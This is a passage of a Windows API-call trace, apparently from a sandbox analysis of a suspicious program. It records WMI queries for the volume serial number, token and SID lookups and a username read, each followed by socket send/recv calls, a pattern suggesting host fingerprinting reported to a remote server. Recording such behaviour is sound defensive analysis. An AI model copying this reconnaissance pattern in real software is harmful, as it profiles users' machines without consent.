	[0196.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0196.146] WbemDefPath:IUnknown:AddRef (This=0x1c83a150) returned 0x3
	[0196.146] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0196.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b81f710) returned 0x0
	[0196.146] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b81f710, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.146] WbemDefPath:IUnknown:Release (This=0x1b81f710) returned 0x3
	[0196.146] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0196.146] WbemDefPath:IUnknown:AddRef (This=0x1c83a150) returned 0x4
	[0196.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0196.147] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x3
	[0196.147] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x2
	[0196.147] WbemDefPath:IUnknown:Release (This=0x1c8318c0) returned 0x0
	[0196.147] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x1
	[0196.147] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0196.147] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0196.147] WbemDefPath:IUnknown:AddRef (This=0x1c83a150) returned 0x2
	[0196.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c83a150) returned 0x0
	[0196.148] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x2
	[0196.148] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x1
	[0196.148] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0196.148] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0196.148] WbemDefPath:IUnknown:AddRef (This=0x1c83a150) returned 0x2
	[0196.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c83a150) returned 0x0
	[0196.148] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x2
	[0196.148] WbemDefPath:IUnknown:AddRef (This=0x1c83a150) returned 0x3
	[0196.148] WbemDefPath:IWbemPath:SetText (This=0x1c83a150, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0196.148] WbemDefPath:IUnknown:Release (This=0x1c83a150) returned 0x2
	[0196.149] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0196.149] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0196.149] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.149] CoTaskMemAlloc (cb=0x8) returned 0x1b804db0
	[0196.149] IEnumWbemClassObject:Next (in: This=0x1c838368, lTimeout=-1, uCount=0x1, apObjects=0x1b804db0, puReturned=0x1c80d0f8 | out: apObjects=0x1b804db0*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0196.169] CoTaskMemFree (pv=0x1b804db0) 
	[0196.169] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0196.169] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0196.169] IUnknown:Release (This=0x1c838368) returned 0x0
	[0196.185] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0196.185] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0196.185] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.185] IWbemClassObject:Get (in: This=0x1c838410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0196.185] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.185] IWbemClassObject:Get (in: This=0x1c838410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0196.186] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0196.186] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0196.186] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.186] IWbemClassObject:Get (in: This=0x1c838410, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0196.186] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.186] IWbemClassObject:Get (in: This=0x1c838410, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0196.186] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.187] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0196.187] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0196.187] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.187] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0196.187] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0196.187] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.187] IWbemClassObject:GetNames (in: This=0x1c838410, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0196.187] SafeArrayGetDim (psa=0x1b813e10) returned 0x1
	[0196.188] IWbemClassObject:Get (in: This=0x1c838410, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.188] IWbemClassObject:Get (in: This=0x1c838410, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.188] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.188] IWbemClassObject:Get (in: This=0x1c838410, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.188] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0196.188] IWbemClassObject:Get (in: This=0x1c838410, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.189] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0196.189] IWbemClassObject:Get (in: This=0x1c838410, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.189] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0196.189] IWbemClassObject:Get (in: This=0x1c838410, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.189] IWbemClassObject:Get (in: This=0x1c838410, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b813e10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b81e6e0, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.190] IWbemClassObject:Get (in: This=0x1c838410, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.190] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0196.190] IWbemClassObject:Get (in: This=0x1c838410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.190] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.190] IWbemClassObject:Get (in: This=0x1c838410, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0196.190] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.191] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0196.191] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0196.191] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.191] IWbemClassObject:Get (in: This=0x1c838410, wszName="SerialNumber", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c80d1ac*=19, plFlavor=0x1c80d1a8*=0) returned 0x0
	[0196.191] IWbemClassObject:Get (in: This=0x1c838410, wszName="SerialNumber", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=19, plFlavor=0x1c80d3d8*=0 | out: pVal=0x1c80d3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c80d3dc*=19, plFlavor=0x1c80d3d8*=0) returned 0x0
	[0196.197] send (s=0x404, buf=0x3093308*, len=36, flags=0) returned 36
	[0196.198] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 88
	[0196.318] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0196.321] send (s=0x404, buf=0x30a6430*, len=34, flags=0) returned 34
	[0196.322] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 121
	[0197.111] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0197.112] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80d198 | out: TokenHandle=0x1c80d198*=0x4c8) returned 1
	[0197.112] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80d268 | out: TokenHandle=0x1c80d268*=0x4cc) returned 1
	[0197.113] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c80d258 | out: TokenInformation=0x0, ReturnLength=0x1c80d258) returned 0
	[0197.113] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b813e00
	[0197.113] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x1b813e00, TokenInformationLength=0x2c, ReturnLength=0x1c80d258 | out: TokenInformation=0x1b813e00, ReturnLength=0x1c80d258) returned 1
	[0197.113] LocalFree (hMem=0x1b813e00) returned 0x0
	[0197.114] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c80d088, DesiredAccess=0x800, PolicyHandle=0x1c80d080 | out: PolicyHandle=0x1c80d080) returned 0x0
	[0197.154] LsaLookupSids (in: PolicyHandle=0x1b813e00, Count=0x1, Sids=0x30b86e0*=0x30b8640*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c80d110, Names=0x1c80d108 | out: ReferencedDomains=0x1c80d110, Names=0x1c80d108) returned 0x0
	[0197.154] LsaClose (ObjectHandle=0x1b813e00) returned 0x0
	[0197.155] LsaFreeMemory (Buffer=0x1b81fc10) returned 0x0
	[0197.155] LsaFreeMemory (Buffer=0x1b811190) returned 0x0
	[0197.155] send (s=0x404, buf=0x30b92e0*, len=49, flags=0) returned 49
	[0197.156] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 91
	[0198.110] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0198.116] CoTaskMemAlloc (cb=0x204) returned 0x1a13d0
	[0198.116] GetUserNameW (in: lpBuffer=0x1a13d0, pcbBuffer=0x1c80d418 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1c80d418) returned 1
	[0198.117] CoTaskMemFree (pv=0x1a13d0) 
	[0198.117] send (s=0x404, buf=0x30cb148*, len=43, flags=0) returned 43
	[0198.118] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 108
	[0199.114] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0199.117] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0199.118] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0199.118] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0199.118] IUnknown:Release (This=0x181868) returned 0x1
	[0199.118] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c831980) returned 0x0
	[0199.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831980, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0199.119] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831980, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c838280) returned 0x0
	[0199.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c838280) returned 0x0
	[0199.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0199.119] WbemDefPath:IUnknown:AddRef (This=0x1c838280) returned 0x3
	[0199.119] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0199.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b81f790) returned 0x0
	[0199.120] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b81f790, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.120] WbemDefPath:IUnknown:Release (This=0x1b81f790) returned 0x3
	[0199.120] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0199.120] WbemDefPath:IUnknown:AddRef (This=0x1c838280) returned 0x4
	[0199.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0199.120] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x3
	[0199.120] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x2
	[0199.120] WbemDefPath:IUnknown:Release (This=0x1c831980) returned 0x0
	[0199.120] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x1
	[0199.121] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0199.121] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0199.121] WbemDefPath:IUnknown:AddRef (This=0x1c838280) returned 0x2
